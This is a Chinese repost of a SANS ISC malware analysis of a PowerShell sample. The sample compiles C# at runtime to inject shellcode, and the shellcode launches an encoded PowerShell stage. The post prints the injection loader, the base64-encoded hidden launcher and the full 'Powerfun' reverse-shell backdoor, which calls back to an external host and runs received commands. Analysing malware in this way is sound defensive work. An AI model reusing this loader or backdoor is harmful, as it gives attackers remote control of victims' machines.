c++调用powershell_从ShellCode启动PowerShell后门

最新推荐文章于 2024-05-12 05:52:30 发布
最新推荐文章于 2024-05-12 05:52:30 发布
阅读量670 收藏 2
点赞数
文章标签: c++调用powershell

当您需要在受害者的计算机上执行恶意操作时,Internet上充满了可以重复使用,分叉或稍作更改以满足您要求的资源。毕竟,如果一些代码可以在GitHub上免费获得,为什么还要重新发明轮子呢?如果您有充分的理由开发了一些攻击性工具(因为您是一个彭特,是一个只从事研究工作的红色团队),那么很可能会重用您的代码。

这是一个在野外发现的实际例子。初始PowerShell脚本的VT分数为8/59

(SHA256:f4a4fffaa31c59309d7bba7823029cb211a16b3b187fcbb407705e7a5e9421d3)。

脚本没有被大量混淆,但是使用的技术很有趣。它使用CSharp Code Provider [ 1 ]类:

$nTlW = New-Object Microsoft.CSharp.CSharpCodeProvider$cUj0x = New-Object System.CodeDom.Compiler.CompilerParameters$cUj0x.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))$cUj0x.GenerateInMemory = $True$zgA = $nTlW.CompileAssemblyFromSource($cUj0x, $dn)

上面的代码动态地编译了一些代码以允许代码注入。这不是我第一次写这种技术[ 2 ],就像动态编写恶意软件[ 3 ]一样。让我们看一下注入代码:

$fH3rI = [y5SR.func]::VirtualAlloc(0, $u4O.Length + 1, [y5SR.func+AllocationType]::Reserve -bOr [y5SR.func+AllocationType]::Commit, [y5SR.func+MemoryProtection]::ExecuteReadWrite)if ([Bool]!$fH3rI) { $global:result = 3; return }[System.Runtime.InteropServices.Marshal]::Copy($u4O, 0, $fH3rI, $u4O.Length)[IntPtr] $ay = [y5SR.func]::CreateThread(0,0,$fH3rI,0,0,0)if ([Bool]!$ay) { $global:result = 7; return }$p0vZ = [y5SR.func]::WaitForSingleObject($ay, [y5SR.func+Time]::Infinite)

  1. 通过VirtualAlloc()在当前进程环境(PowerShell解释器)中允许一个新的内存区域。最重要的参数是“ ExecuteReadWrite”(著名的0x40值)

  2. Shellcode通过Copy()复制到新分配的内存中

  3. 通过CreateThreat()创建了新威胁

  4. 为了阻止父威胁,调用了WaitForSingleObject()

让我们看一下shellcode。这是Base64编码的数据块:

$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite base64dump.py f4a4fffaa31c59309d7bba7823029cb211a16b3b187fcbb407705e7a5e9421d3.dms -n 100 -s 1 -S;}$uD$$[[aYZQpowershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIADeXAV8CA51WW2/bNhR+9684cLVaQixCCTCgCJBirpJuAdLWqLzlwTAQWjqOtcikRlK+LPF/LylRF8cJukwvtsjD73znOxfqHYz5BsWiYODDrUiVQgbzHXzSP5NCMBTwHi7pGuEPKpJdr6ctY5VyBr+j8m9xHmcpMgW9xx7ox9nEcAFfceN/m/+NsQJ/ssvxK12hXlRE24elfW1M/pR4iQtaZCoUmOidlGZSQzhKFNhYjQXf7sgzC73eWalte/uWYl6H1nuEcn9MBV251f9ppETK7mdOyFcrypLh4Woks5izZ4uXfMMyTpNy1bOYgscoJVgBVjwpMjQEf3M9qEzSBbi1G/DxH+jPU5b0vXKzOleezVKp5deSX2iXO/1/RYxqEY8fUEkyifMbazH7EHwIjg8SqahQxq/1XO7aFF107EZxjLnSgFU63IrK/jW6AtcoJB4zbqA7KX+JeTi2jvp5cvrvnLCsPzQhWL+9SjupBNKVIVrhEl1jUbmmCbbUqtRUzEyZ9G0mOrykzKIa7BVqGBe63Hckqk1d63/oLHQ94dB9dCYafQ8+lTA9OPMdV1xhiEKlizSmCv+iWZpQU3QhzbI5jR9mnvcCHTIq1NJUrDk0kkeieJ20tWq00XTlms53CqezmWN+TcEFhJwF+nn65THYW0WRJfW2O1W4VQRZzBNTzefnoyi8vvaMyp+Mjdu/1WXJN7KaCdESswxEwZi2Bq1BIXVp9uEEHGTrc/PGTGOf6DWdjmYj5qu8UO3mHQt5vhPp/VKBG3pwFpz+Cl/SWHDJFwpCLnIuSu0IjIxHYylBoHawxoTcsTtmK89qQsygQreNbhgM2xdyg+xeLbsVU/dtt2aOSuZtUk1PZnCjIY02tudJw/PtXOtTn7m4ovFSc65AIWXNTGmtWtrmcQ9GsUfqaKupVSN5T9dszR/Qv9rmWlup9W5Q9odt+CYlBuMIBjrPJYsbHpeZ9MiYqqVeHXwc/O/UbZZphq7rpGUPVMe/I03cquKHEAzBOTjngc8QgqPcXhn6mEx0KK9dT3Y0GBNShnhlQ25RdINTQ6WDZidUKXMdDjip96ys9DwwWh4lAPx6zFbgZx/fn8ITfCuUX6GCleIA6gxKQWpgLfJPUgCDFmRriDgoBBfTYHbgrMO63CdxhlS43ksMLrovuvG3veNO+k/l08L8tHW6pXLUOPWZz1khl83Na8egvU7CjEu08bR3YaR4Xl+A+uuh13w1NMmx1x/49uYxA+QH7Wza3jkJAAA='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"

Shellcode易于理解,它使用WinExec()启动另一个PowerShell命令,该命令可解码更多Base64编码的数据,将其解压缩并执行。让我们在scdbg中查看它:

41a3ff25194634e5083a5f180da6e1c8.png

以下是在注入的威胁中执行的PowerShell代码:

# Powerfun - Written by Ben Turner & Dave Hardyfunction Get-Webclient {    $wc = New-Object -TypeName Net.WebClient    $wc.UseDefaultCredentials = $true    $wc.Proxy.Credentials = $wc.Credentials    $wc}function powerfun {     Param(     [String]$Command,    [String]$Sslcon,    [String]$Download    )     Process {    $modules = @()      if ($Command -eq "bind")    {        $listener = [System.Net.Sockets.TcpListener]8080        $listener.start()            $client = $listener.AcceptTcpClient()    }     if ($Command -eq "reverse")    {        $client = New-Object System.Net.Sockets.TCPClient("pd1zb[.]nl",8080)    }    $stream = $client.GetStream()    if ($Sslcon -eq "true")     {        $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))        $sslStream.AuthenticateAsClient("pd1zb[.]nl")         $stream = $sslStream     }    [byte[]]$bytes = 0..20000|%{0}    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")    $stream.Write($sendbytes,0,$sendbytes.Length)    if ($Download -eq "true")    {        $sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")        $stream.Write($sendbytes,0,$sendbytes.Length)        ForEach ($module in $modules)        {            (Get-Webclient).DownloadString($module)|Invoke-Expression        }    }    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')    $stream.Write($sendbytes,0,$sendbytes.Length)    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)    {        $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding        $data = $EncodedText.GetString($bytes,0, $i)        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )        $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '        $x = ($error[0] | Out-String)        $error.clear()        $sendback2 = $sendback2 + $x        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)        $stream.Write($sendbyte,0,$sendbyte.Length)        $stream.Flush()      }    $client.Close()    $listener.Stop()    }}powerfun -Command reverse -Sslcon true

后门可以在以下github.com存储库中找到:davehardy20 / PowerShell-Scripts [ 4 ]。下一个问题是:为什么要在初始的PowerShell进程中执行PowerShell脚本的进程注入?VT评分低证实了可能改善混淆性!

[1]  https://docs.microsoft.com/zh-cn/dotnet/api/microsoft.csharp.csharpcodeprovider?view=dotnet-plat-ext-3.1[2]  https://isc.sans.edu/forums / diary / Malicious + PowerShell + Compiling + C + Code + on + the + Fly / 24072[3]  https://isc.sans.edu/forums/diary/Malware+Samples+Compiling+Their+Next+Stage+on + Premise / 25278[4]  https://github.com/davehardy20/PowerShell-Scripts

Xavier Mertens(@xme)高级ISC处理程序-自由网络安全顾问

本文翻译自 - 

https://isc.sans.edu/forums/diary/PowerShell+Backdoor+Launched+from+a+ShellCode/26602/    - 转载请注明

6dfe1733e840297641f4e1561be74926.gif

weixin_39592137
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
c++ 调用 powershell_十九,Powershell基础入门及常见用法(一)
weixin_42395980的博客
12-27 5641
一.Powershell初识1.基础概念Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。传统的CMD支持脚本编写,但扩展性不好,而Powershell类...
paip. c++ 调用.net dll 最好方式powershell 使用总结.
attilax的专栏
09-23 3924
paip. c++ 调用.net dll 最好方式powershell 使用总结. 作者Attilax ,  EMAIL:1466519819@qq.com  来源:attilax的专栏 地址:http://blog.csdn.net/attilax  c++ 调用.net dll ...有几个方法:  1.使用CLR HOST..不过麻烦, 以及只能调用static 方
c++调用powershell_微软发布PowerShell 7.0,开发人员:自7以后才是真·PowerShell
weixin_39859061的博客
11-20 252
鱼羊 发自 凹非寺量子位 报道 | 公众号 QbitAI那个模糊了脚本和正经程序的边界,让一切皆有可能的PowerShell,7.0正式版发布啦。新的语法糖,更好的兼容性,最重要的,是从.NET Core 2.x完全迁移到了3.1。背后生态的升级,也意味着PowerShell 7比起它的老版本们,更具向后兼容性。PowerShell的开发人员甚至表示:PowerShell 7标志着Windows ...
Windows C++: 提升代码权限,运行前、运行时。
最新发布
Bobowen的博客
05-12 1127
关联和区别:通过修改应用程序的清单文件,可以使程序在启动时默认要求管理员权限。与运行时动态获取权限的方法不同,清单文件的方法是固定和全局的。优点简单直接,不需要额外代码。一次配置后,程序始终要求管理员权限。缺点如果不需要所有操作都以管理员身份执行,此方法可能过于强制。使用场景:适合于所有操作都需要管理员权限的程序,例如系统工具或安装程序。这些方法从全局到局部、从简单到复杂提供了不同的获取管理员权限的方案。
c++调用powershell_深入理解函数调用(上)
weixin_39541767的博客
10-21 647
前边一周我们介绍了使用栈来完成表达式求值,这一周的任务就是使用递归下降的文法分析来完成表达式求值。在那之前,我们先等一下,得把Java中的函数调用理解透彻,否则很难写出正确的递归。从一开始写程序,我们就和各种各样的函数,成员方法打交道。在这个课程里,我把函数(function)和方法(method)混着用。不过,这里还是明晰一下这个概念。通常,我们说函数,是指可以在全局命名空间里独立存在的函数。而...
QPowerShell:通过 Qt C++ 与 Windows PowerShell 交互的简单模块
06-22
QPowerShell QPowerShell 为 Qt C++ 开发人员提供了一种与 Windows PowerShell CLI 交互的简单方法。 它仅在 PS 2.0 上进行过测试,但也应在较新的版本上进行测试。 这是我向公众发布的第一个项目。 请随时提交错误、建议或功能请求。 安装 只需克隆这个 repo 并将 src 文件夹中的所有文件包含到您的项目中。 有用的位 QPowerShell 实例创建 PowerShell.exe 进程并挂钩它们的 STDIN 和 STDOUT 流。 PS 接口称为 QPowerShellPipeline。 创建管道时,它们存储在 QPowerShell 实例持有的池中。 您可以通过调用 QPowerShell::nextAvailablePipe 向 QPowerShell 实例询问可用管道,该管道返回指向可用(当前未执行 PS 命令/读取
PowerShell_Setup_x86.rar
08-18
"PowerShell_Setup_x86.rar" 文件是一个针对32位(x86)操作系统的PowerShell安装包,通常用于升级或安装在旧版Windows系统上运行的PowerShell。此压缩包可能包含必要的组件和补丁,以便于用户在没有内置PowerShell...
Microsoft.PowerShell_profile.ps1
11-06
将脚本文件放入默认路径下 以管理员权限打开powershell 开始自动安装 powershell美化
powershell_credentials
06-24
总的来说,这个“powershell_credentials”项目可能是一个关于PowerShell中凭据管理和安全的最佳实践集合,涵盖了从获取、存储到使用凭据的各个方面,对于系统管理员和PowerShell开发者来说具有很高的学习价值。...
PowerShell_LangRef_v4.pdf.zip_powershell
09-24
"PowerShell_LangRef_v4.pdf.zip_powershell" 提供了关于PowerShell的详细语言参考,特别是版本4的相关内容,这对于学习和理解PowerShell的核心概念、语法和常见用例非常有价值。 描述中的“PowerShell Examples ...
mimikatz_trunk_powershell_
09-29
标题"Mimikatz_trunk_powershell_"指向的是一个与Mimikatz工具相关的PowerShell使用案例,这个工具主要用于安全研究和渗透测试,特别是针对Windows系统中的密码获取。Mimikatz是由法国安全研究员Benjamin Delpy开发...
cmd执行powershell命令
12-05
之前发现一个比较好玩的代码,就是可以查询EventLog中的蓝屏是否存在,命令是找到了,但是我希望在CMD上运行,可百度提供了一些办法,但是方法过旧,便自己尝试一下,发现的一个好的方法
C#调用powershell例子
09-05
C#调用powershell脚本的一个例子,很简洁清晰,vs打开项目即可运行。 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。
C++学习(二零九)PowerShell
hankern的专栏
02-13 322
按住shift+右键,可以打开PowerShell。 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。
c++调用powershell_使用PowerShell命令也可以管理微软自带的Defender防病毒软件
weixin_39772352的博客
10-21 670
在Windows 10上,Microsoft Defender防病毒软件(以前称为Windows Defender防病毒软件)是Windows安全体验的一部分,它提供了强大的实时保护,可抵御有害病毒、勒索软件、间谍软件、rootkit以及许多其他形式的恶意软件和黑客。尽管用户可以通过Windows安全应用程序轻松控制日常的防病毒任务,但是还可以使用PowerShell命令管理反恶意软件解决方案,这...
【Windows C++调用powershell上传指定目录下所有文件
think_ycx的专栏
07-23 2585
上周写的一个恶意代码片段,功能为: C++实现读取"C:\Users\thinkycx\.ssh\"目录下所有文件(不包括子文件夹),使用getProcessAddress获取system函数地址,动态调用system执行命令powershell上传文件。 测试powershell功能用的上传命令,注意powershell代码中的\"代表转义的"。 powershell "Invoke-R...
PHP的各种安全问题总结 一文了解PHP的各类漏洞和绕过姿势
闵行小鱼塘
11-26 3542
尽可能全面的总结PHP的各种安全问题:基础知识、弱类型及各种函数、伪协议、反序列化、其他,本篇持续更新
c++调用powershell_优化|Shortest Path Problem及其对偶问题的一些探讨(附Python调用Gurobi实现)...
weixin_39963440的博客
11-09 211
Shortest Path Problem :The ModelPython调用Gurobi求解SPPSPP的对偶问题Python调用Gurobi求解SPP的对偶问题SPP模型学术界的标准写法SPP对偶问题的直观理解Python调用Gurobi:Shortest Path Problem及其对偶问题的一些探讨最短路问题 (Shortest Path Problem, SPP)是一类非常经...
函数的扩展---尾调用优化
GXing007的博客
03-09 438
什么是尾调用?尾调用(Tail Call)是函数式编程的重要概念,指某个函数的最后一步是调用另一个函数。function f(x){ return g(x); }上面代码中,函数f的最后一步是调用函数g,这就叫尾调用。以下三种情况,都不属于尾调用。// 情况一 function f(x){ let y = g(x); return y; } // 情况二 function f(x){...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值